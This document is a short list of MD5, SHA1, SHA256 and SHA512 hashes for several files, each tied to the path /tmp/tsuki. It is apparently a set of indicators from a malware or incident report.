SHA1 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa
SHA256 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117
SHA512 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8

/tmp/tsuki

MD5 6cf78b3572c325d809ad4677c2ebd6a2
SHA1 be2f27c2b001f981344e52333568cb0dc7ffe7ad
SHA256 c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0
SHA512 bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24

/tmp/tsuki

MD5 2cf4b7e9a6fa11dbff627fc7aeee3f97
SHA1 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb
SHA256 eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d
SHA512 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57

/tmp/tsuki

MD5 3cd8418ac8f414def6727fe141d328b9
SHA1 dc61b74e9e08ff3208ee96a6c94f8247e6196b99
SHA256 cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3
SHA512 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9

/tmp/tsuki

MD5 eeed291445ee3e6bac53540dfd6cd91c
SHA1 afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41
SHA256 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78
SHA512 ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283

/tmp/tsuki

MD5 adf30c84e4d1a741bb51593fa750d624
SHA1 ca52225d16c403e9e6ab662e8dab63496281945d
SHA256 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806
SHA512 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846